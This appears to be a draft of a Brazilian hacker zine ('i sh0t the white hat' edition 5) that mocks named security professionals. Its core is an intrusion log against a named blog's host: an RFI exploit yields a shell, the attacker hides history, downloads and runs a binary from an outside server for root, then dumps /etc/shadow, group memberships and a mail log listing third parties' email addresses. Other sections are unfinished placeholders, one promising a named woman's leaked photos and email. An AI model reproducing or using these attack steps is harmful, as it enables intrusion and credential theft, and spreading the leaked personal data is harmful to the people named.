#!/bin/sh
#############################################################################
##                                                                         ##
##                     PR0J3KT M4YH3M BR4Z1L                          	   ##
##               	     rm -rf /whitehats             		   ##
##           	    take back the underground          		           ##
##                                            		                   ##
##                            APR3S3NT4                                    ##
##     	             i sh0t the white hat eDiÇãO 5       		   ##
##                    eDiÇãO eSpeCiAl FiM do mUnDO                         ##
##                                                                         ##
#############################################################################
#                                                                           #
#                                             MMNMM~                        #
#                                          8MM$ZZZZNMM                      #
#                                          8MMOZZZZMMM                      #
#                                          8MMZZ$     MMM          +MM:     #
#                                          8MMZZZ     MMM          +MM:     #
#                                  MMMMMMMNO$$ZZZ  8MMZZZMMNMMMMMMMD$$MMM   #
#                          88D77$NN777$$$77$ZZZZZ$$ZZZZZZZZZZZZZZZZZZZ$ZZNNN#
#                          DDD$$OMM7$$$$$$$ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZMMM#
#                          NMMZZZZZZZZZZZZZZZZZZZMM:  MMM  +MM   MMZ  NMM   #
#                          NMMZZZZZZZOZZZZZZZZZZ$MM,  MMM  =MM   MMZ  NMN   #
#                    ,DDO$$ZZZZZZ$$ZZODDDZZZZZMMN  DMM   MN8  MMM  +MM:     #
#                    ,DDO$$OOOZZ$$$ZZZ888ZZZZZNNN  I77   $$I  OOO  ~ZZ,     #
#                    ,MM8ZZDDDZZZZZZOZZZZZZZZONMN                           #
#               ZDD$$$ZZZZZ$$7ZZODDZZZ$$$ZZZZOMMN         i sh0t            #
#               $DD$$$OZZZZ$$$ZZODDZZZ$$$ZZZZZMMN      t3h wh1t3h4t         #
#               OMMZZODDOZZZZZZZZZZZZZZZZZZZZZMMN                           #
#         ~::,::OMMZZZDD8ZZZZ$ZZZZZZZZZZZZZZZZMMN        ed1c40 5           #
#         :DDD$$ZOZZZZ$$ZZZDDDZZ$$$ZZODDDZZZZZMMN                           #
#         ~NNNZZO8DZZZZZZZZOZZZZ$ZZZZZZZOZZZZZNNM                           #
#         ~MMMOZ8DDZZZZZZZOZZOZZZZZZZZZZZZZZZZMMM                           #
#    ?DD$ZZOZZZZ$$$OZODDOZZ$$$ZZODD$ZZ$$$ZZZZZZZZMM   MMM   MM , MMO  NMM   #
# ~~~?DD7$$OZZZZ$$$OZZDDOZZ$$$ZZZDDZZZ$$$ZZZZZZZZNM   MMM   MM   MMO  NMM   #
# :MMNMMZOODDDOZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZNMM   MMO  MMM  +MM:  MMM#
#ZZO8O88$ZZOOOZZODDZZZZZZZZ$$$$$$$$$$$DDDZZZZZ$$$$$OOO+++88Z++888++I8O?++MMM#
#MM$Z$$$$$$$$$Z$DMMZZZZZZ$$$$$$$$$$$$$MMMZZZZZ$$$$$$$$$$$$$$$$$$$$$$$$$$$MMM#
#  MNNDDDDDDDDDDNMNZZZZZODDDDDDDDDDDDDMMMZZZZZDDDDDDDDDDDMMNNMNMMMNNMMNMN   #
#  NNNDDDDDDD8DDNNNZZZOZODDDDDDDDDDDDDMNMOZOZZDD8DDDDDDD8NNNMNNMMMMNMMNNN   #
#                  MMMMMI     MMMMM      MMMMM     DMMMMM                   #
#                  MMMMMI     MMMMM      MMMMM     DMMMMM                   #
#                                                                           #
#                                                                           #
#############################################################################
#...........................................................................#
#...........................................................................#
##   		<*> ish0tthewhitehat.istwh (siTe of1cial)                  ##
##                                                                         ##
##   		mirrorz                                                    ##
##	        <*> exploit-db.com/docs/istwh/                             ##
##	        <*> packetstormsecurity.org/mag/istwh/                     ##
##	        <*> blog.corujadeti.com.br/allicon/istwh                   ##
##	        <*> oys.com.br/meupaucresca/istwh                          ##
##	        <*> bhack.com.br/istwh                                     ##
##	        <*> websecforum.com.br/istwh                               ##
##	        <*> ashack.com.br/info/istwh                               ##
##	        <*> desafiohacker.com.br/istwh                             ##
##	        <*> defhack.com.br/istwh                                   ##
##                                                                         ##
##                                                                         ##
##   		|*| ish0tthewhitehat@gmail.com |*|                         ##
##                                                                         ##
#############################################################################
###                                                                       ###
##               [-*-] INiTIaLIZiNG ATTAcK VeCTORs                         ##
##               [-*-] BYPaSSING SSH ENCRYPTIoN                            ##
##               [-*-] LetZ GeT ST4Rt3d!!!!!!                              ##
###                                                                       ###
#---------------------------------------------------------------------------#
#                        ;   eQu1p3 3d1t0r14l   ;                           #
#                        `----------------------'                           #
#                                                                           #
#   j3r3m14s j0s3            -> 0 sc4nn3r qu3m BuT0 p4h n01s b3b3r          #
#   sys10g m4rl3y            -> n0 l0gz n0 cr1m3z                           #
#   th3 BSd t3rr0r1sT        -> 3u qu3r0 m41s e qu3 meU p4u cR3sc4          #
#   f4us7o c0d3loko          -> 0 l0c0 m3u, s3 L1g4 n3ss4 f3R4              #
#   c4p1t40 n4S-c1um3nt0     -> p3D3 pr4 s4iR, wh1t3h4t v4g4bUnd0           #
#                                                                           #
#---------------------------------------------------------------------------#
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
#                                                                           #
#  "Yes, I am a criminal. My crime is that of curiosity. My crime is that   #
#  of judging people by what they say and think, not what they look like.   #
#  My crime is that of outsmarting you, something that you will never       #
#  forgive me for."                                                         #
#                                                                           #
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#


                 da w4r 0n da n3t will n3v3r d1e.
                 da int3rn3t enjoyz 0ur w4r, it ph33dz 0ff it.
                 w3 d0 it ph0r da thr1ll.
                 we d0 1t ph0r the luv.
                 th0u sh411 truzt n0 0n3.


#############################################################################
              =-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=
                              -=-=] INTRO [=-=-
              =-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=
#############################################################################

1; intro
2; corujito r3l04d3d
3; LV architecture
4; 0day extravaganza
5; p4ppar4zz1 h4ck3r: carol (b0zz4) l3aked p1cs
6; pwnie awards braSil
7; outr0

#############################################################################


-----------------------------------------------------------------------------------------
1; intro
-----------------------------------------------------------------------------------------

            \
             \         
             |\      
             /|          Entao voce trabalha com seguranca?
            /'|             
          ,' //            Conte-nos mais sobre aquele Blog
        ,'..`/                   que voce roda em Wordpress...
       /   '/                                                          _...._.---._
     /:   ,'                                                         .' ,--. ,--.  \
   ,'    ,                                                           | /... /...|  |,..._
  ,'    /                                   _..---------..__         \.\_O_/  O /  '     \
 .'  _, /                 .---..._       ,-'  __.-.....__   '-  ___.-----._'---'     ,'  |
 |-`'  (                  |       `--..,'_,-''   '.     `''"-._( .-.'.--.         _.'   /
 |      \                 |  ,.__     /,'  |      |      \     \ | / |  /      ,,'  __ /
 |     .`.               /  .'  _)--..'    |       |     '\     \`  ..--:`     _.--' \
 |   .'  .-.__           |  |,-' _.-\      |       |      |     |`\''''''''_.-'   ,' (
  \         ,-`''-- =--::|   \-'|    |     |       |      |     | `'.....-' .,:-'  |  \
   `.    ,  /  /     '`. |   |  |    |     |       |      |     |  \__.-` `..      \   \
    '.  /  /  /         '|   |  |    [     |       |       |    |    ,       '._    |  |
      `.  /  | .--------'    `-. |   '     |       |       |    |,L______       `--..   \
        ``.  | \               |-^---''".  |      |       .'    |.'      ``-..._         \
           `.-..\.__...---....,'-.....--'`'"-........_____|.. `'                `'`--..../ 


n0v1d4d3s d4 5a 3d1c4o:

c0mpr4m0s n0ss0 TLD pr0pr10 c0m a d0aca0 d3 5.000k d0l4r3s d0 c0ruj1t0 - ish0tthewhitehat.istwh
pub1ic40 d3 0d4yz de p3squ1s4ad0r3s r3n0m4d0s d4 c0mun1d4d3 br4aSil3ir4
pwni3 4w4rds v3rs40 tup1n1qu1m, c0m o anch1ses no c0m1t3 org4n1z4d0r
em41l p3ss041 d4 c4r01 (b0zz4) l3ak3d c0m f0tOs p1C4nt3s


xxxxx
(ja ta pronto, depois vou colar o resto do intro, trocar ordem)
		   
-----------------------------------------------------------------------------------------
2; corujito r3l04d3d
-----------------------------------------------------------------------------------------

xxx

umad:~/pentest/cusom/# ./l1c34n4 -h blog.corujadeti.com.br/xmlrpc.php -p 80 -v6 -rfi=list.txt

    [+] l1c34n4 xplt - priv8 priv8 priv8 [+]
    [+] target: 2804:10:5::89:144        [+]
    [+] nginx Port: 80                   [+]
    [+] rfi list: list.txt               [+]
    [+] finding offset...                [+]
    [+] testing for rfi                  [+]
    [+] g0tsh3ll!                        [+]

sh-3.3$ export HISTFILE=/dev/null

sh-3.3$ echo 3u qu3r0 m4is eh qu3 m3u p4u cr3sc4
3u qu3r0 m4is eh qu3 m3u p4u cr3sc4

sh-3.3$ whoami
corujadeti

sh-3.3$ id
uid=724(corujadeti) gid=725(corujadeti) groups=504(tar),725(corujadeti)

sh-3.3$ env
PHPRC=/usr/local/fastcgi/php.ini/php.corujadeti.ini
USER=root
FCGI_WEB_SERVER_ADDRS=127.0.0.1
PHP_FCGI_CHILDREN=10
PATH=/usr/bin:/bin
PWD=/home/corujadeti/www/blog/
SHLVL=1
PHP_FCGI_MAX_REQUESTS=10000
_=/usr/bin/env

sh-3.3$ df -ah
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda1              35G   19G   15G  56% /
proc                     0     0     0   -  /proc
sysfs                    0     0     0   -  /sys
devpts                   0     0     0   -  /dev/pts
/dev/sda3              11G  529M   11G   5% /var
none                     0     0     0   -  /proc/sys/fs/binfmt_misc
tmpfs                 1.0G   77M  948M   8% /tmp
/dev/sdb1             250G  242G  8.1G  97% /home
tmpfs                 1.0G  172M  853M  17% /home/logs

sh-3.3$ uname -an
Linux web331.kinghost.net 2.6.37 #1 SMP Tue Jan 25 13:31:03 BRST 2011 x86_64 x86_64 x86_64 GNU/Linux

// m0m3nt0 j4ilbr3ak

sh-3.3$ wget http://netclass.oys.com.br/dadinho
--12:11:34--  http://netclass.oys.com.br/dadinho
Resolving netclass.oys.com.br... 91.121.96.193
Connecting to netclass.oys.com.br|91.121.96.193|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4921 (4.8K) [text/plain]
Saving to: `dadinho'

sh-3.3$ chmod +x dadinho

sh-3.3$ ./dadinho
  [+] echo "dadinho eh o caralho"
  [+] tr dadinho joao_pequeno
  [+] mv /bangu/joao_pequeno /home/joao_pequeno
  [-] invalid permissions, trying alternative method
  [+] mail michaelscofield@prisonbreak.com < escape
  [+] successful jailbreak!
  [+] g0tr00t
  
sh-3.3# cat /etc/shadow | grep corujadeti
corujadeti:$1$abcde$ppjcWUbkHyesBXgD5e12w/:15333:0:99999:7:::

sh-3.3# cat /etc/passwd | grep corujadeti
corujadeti:x:724:725::/home/corujadeti:/bin/bash

sh-3.3# cat /etc/group | grep corujadeti
tar:x:504:videoclubofsex,sabia,guiadeautopecas,chutimetro,provider,
megapremiumbr,aprenderemead,redcon,x-flog,nacaojovemmineiros,ponoticias,
agrorural,pibpin,curt,rockup,cwkweb,ateliercosturacurso,coelhinhasluxo,
pccareinfo,rccrc,corujadeti,infogameslitoral,clinicafonoaudiologica,
marciodias,saomarcos
corujadeti:x:725:

sh-3.3# cat /var/tmp/.historico.bloqueado
15/06/2012 09:17 de [wordpress@blog.corujadeti.com.br] para [corujadeti@gmail.com] em [/home/corujadeti/www/blog] por [corujadeti] ~ corujadeti multiplo
15/06/2012 09:47 de [joao.mt.2005@gmail.com] para [pedrotaques@senador.gov.br] em [/home/pedrotaquesmt/www/form_contato] por [nobody] ~ pedrotaquesmt multiplo
15/06/2012 11:18 de [migsgfe@gmail.com] para [pedrotaques@senador.gov.br] em [/home/pedrotaquesmt/www/form_contato] por [nobody] ~ pedrotaquesmt multiplo
15/06/2012 11:29 de [robertocesar.direito@hotmail.com] para [pedrotaques@senador.gov.br] em [/home/pedrotaquesmt/www/form_contato] por [nobody] ~ pedrotaquesmt multiplo
15/06/2012 11:54 de [wordpress@blog.corujadeti.com.br] para [corujadeti@gmail.com] em [/home/corujadeti/www/blog] por [corujadeti] ~ corujadeti multiplo
15/06/2012 12:05 de [wordpress@blog.corujadeti.com.br] para [corujadeti@gmail.com] em [/home/corujadeti/www/blog] por [corujadeti] ~ corujadeti multiplo
15/06/2012 12:38 de [wordpress@blog.corujadeti.com.br] para [corujadeti@gmail.com] em [/home/corujadeti/www/blog] por [corujadeti] ~ corujadeti multiplo
15/06/2012 12:53 de [gustcol@gmail.com] para [gustcol@gmail.com] em [/home/corujadeti/www/blog] por [corujadeti] ~ corujadeti multiplo

xxxxx

-----------------------------------------------------------------------------------------
3; LV architecture
-----------------------------------------------------------------------------------------

xxxxx
colar logs petrobras
oys, ja conseguiu root ou ta soh com o shell do moodle?

-----------------------------------------------------------------------------------------
4; 0day extravaganza
-----------------------------------------------------------------------------------------

xxxxx
esperar keynote acabar, nao esquecer de passar no banheiro (foto)

-----------------------------------------------------------------------------------------
5; p4ppar4zz1 h4ck3r: carol (b0zz4) l3aked p1cs
-----------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------
6; pwnie awards braSil
-----------------------------------------------------------------------------------------

>  m31h0r r3sp0ns1b13 d1scl0sur3

http://seclists.org/fulldisclosure/2012/Feb/264

BSDaemon, Conviso & Kousuke Ebihara

>  m3lh0r d1scuss40 n0 tw1773r

jczucco x gustcol

jmmrabelo x lv architecture

> m3lh0r p4l3str4 n40 ac31t4

mphx2

> m3lh0r s3nh4 de CISSP n0 linkedin


xxx
ACABA DE ESCREVER LOGO PESTE

-----------------------------------------------------------------------------------------
7; outr0
-----------------------------------------------------------------------------------------
xxx

-----------------------------------------------------
| C0nTr1bu4m p4r4 0 ca0s ish0tthewhitehat@gmail.com |
-----------------------------------------------------